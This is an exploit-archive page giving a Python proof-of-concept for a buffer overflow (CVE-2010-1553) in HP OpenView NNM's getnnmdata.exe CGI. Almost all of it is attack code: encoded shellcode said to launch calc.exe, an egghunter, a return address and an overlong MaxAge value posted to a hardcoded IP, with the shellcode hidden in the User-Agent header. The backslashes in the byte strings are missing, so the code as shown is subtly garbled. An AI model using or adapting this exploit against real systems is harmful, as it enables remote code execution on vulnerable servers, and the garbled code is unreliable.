HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
# Published : 2010-07-02
# Author : S2 Crew
# Previous Title : HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution
# Next Title : Microsoft Internet Information Services 5 Authentication Bypass Vulnerability

# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution 
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1553

# Code :

#!/usr/bin/python

import struct
import socket
import httplib
import urllib

# calc.exe Windows Execute Command
sc2 = (
"x89xe7xdbxc4xd9x77xf4x5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x4cx49x47x70x43x30x45x50x51x70x4fx79"
"x4dx35x50x31x4bx62x43x54x4ex6bx51x42x46x50x4e"
"x6bx50x52x46x6cx4ex6bx51x42x46x74x4cx4bx43x42"
"x47x58x46x6fx4fx47x42x6ax46x46x44x71x4bx4fx44"
"x71x4fx30x4ex4cx47x4cx51x71x51x6cx46x62x44x6c"
"x45x70x4fx31x48x4fx44x4dx47x71x4ax67x4ax42x4c"
"x30x43x62x46x37x4cx4bx50x52x44x50x4cx4bx42x62"
"x45x6cx45x51x4ex30x4cx4bx47x30x50x78x4ex65x4b"
"x70x43x44x43x7ax43x31x4ax70x46x30x4ex6bx51x58"
"x42x38x4cx4bx46x38x47x50x43x31x4bx63x4bx53x47"
"x4cx42x69x4cx4bx45x64x4cx4bx45x51x4ax76x46x51"
"x4bx4fx45x61x49x50x4cx6cx4ax61x48x4fx44x4dx45"
"x51x4ax67x47x48x4bx50x44x35x4bx44x44x43x43x4d"
"x4ax58x47x4bx43x4dx51x34x51x65x4dx32x42x78x4c"
"x4bx43x68x47x54x47x71x4ax73x51x76x4cx4bx46x6c"
"x50x4bx4ex6bx42x78x45x4cx45x51x49x43x4cx4bx47"
"x74x4ex6bx47x71x4ex30x4dx59x47x34x46x44x44x64"
"x51x4bx43x6bx50x61x42x79x42x7ax50x51x49x6fx49"
"x70x43x68x51x4fx51x4ax4ex6bx45x42x4ax4bx4dx56"
"x43x6dx50x6ax47x71x4cx4dx4cx45x4ex59x45x50x45"
"x50x45x50x50x50x43x58x45x61x4ex6bx42x4fx4bx37"
"x4bx4fx4ax75x4dx6bx4cx30x4cx75x49x32x42x76x50"
"x68x4dx76x4ax35x4fx4dx4fx6dx4bx4fx49x45x47x4c"
"x43x36x51x6cx45x5ax4bx30x49x6bx4bx50x43x45x45"
"x55x4dx6bx42x67x47x63x51x62x42x4fx50x6ax45x50"
"x51x43x4bx4fx4bx65x45x33x43x51x50x6cx45x33x46"
"x4ex43x55x51x68x50x65x43x30x45x5ax41x41"
)

egghunter = (
"x89xe1xdaxd7xd9x71xf4x5bx53x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x50x66x4fx71x4bx7ax49x6fx46x6fx50x42x51x42x43"
"x5ax45x52x43x68x48x4dx46x4ex45x6cx47x75x42x7a"
"x44x34x48x6fx4ex58x42x74x50x30x46x50x42x77x4c"
"x4bx4ax5ax4ex4fx43x45x4ax4ax4cx6fx43x45x4ax47"
"x49x6fx4bx57x41x41"
)

ret = struct.pack('<L',0x5A667A77) # ppr
jmp = "x74x21x44x44"

p = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter

h = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}

c = httplib.HTTPConnection('172.16.29.149')
c.request("POST","/OvCgi/getnnmdata.exe",p,h)
r = c.getresponse()

print r.status, r.reason
data = r.read()
print data
c.close()

print "nDonen"